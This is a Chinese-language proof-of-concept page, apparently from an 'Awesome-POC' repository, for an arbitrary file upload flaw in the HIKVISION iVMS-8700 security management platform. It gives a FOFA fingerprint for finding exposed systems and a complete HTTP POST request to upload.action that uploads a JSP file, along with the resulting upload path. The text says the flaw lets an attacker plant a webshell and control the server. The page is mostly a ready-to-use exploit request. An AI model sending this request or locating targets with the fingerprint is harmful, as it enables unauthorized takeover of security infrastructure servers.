Awesome-POC/网络设备漏洞/HIKVISION iVMS-8700综合安防管理平台 upload.action 任意文件上传漏洞.md

55 lines
1.5 KiB
Markdown
Raw Normal View History

2023-07-05 09:20:42 +08:00
# HIKVISION iVMS-8700综合安防管理平台 upload.action 任意文件上传漏洞
## 漏洞描述
HIKVISION iVMS-8700综合安防管理平台存在任意文件上传漏洞攻击者通过发送特定的请求包可以上传Webshell文件控制服务器
## 漏洞影响
HIKVISION iVMS-8700综合安防管理平台
## FOFA
```
icon_hash="-911494769"
```
## 漏洞复现
登录页面
2023-07-11 10:57:15 +08:00
![image-20230704111156427](./images/image-20230704111156427.png)
2023-07-05 09:20:42 +08:00
发送请求包上传文件
```
POST /eps/resourceOperations/upload.action HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: MicroMessenger
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ISMS_8700_Sessionname=CA0F207A6372FE883ACA78B74E6DC953; CAS-USERNAME=058; ISMS_8700_Sessionname=4D808BE7BE0E5C7047B9688E6009F710
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj
Content-Length: 212
------WebKitFormBoundaryTJyhtTNqdMNLZLhj
Content-Disposition: form-data; name="fileUploader";filename="test.jsp"
Content-Type: image/jpeg
<%out.print("hello");%>
------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
```
上传路径
2023-07-11 10:57:15 +08:00
![image-20230704111213114](./images/image-20230704111213114.png)
2023-07-05 09:20:42 +08:00
```
/eps/upload/769badc8ef5944da804a4ca3c8ecafb0.jsp
```
2023-07-11 10:57:15 +08:00
![image-20230704111225074](./images/image-20230704111225074.png)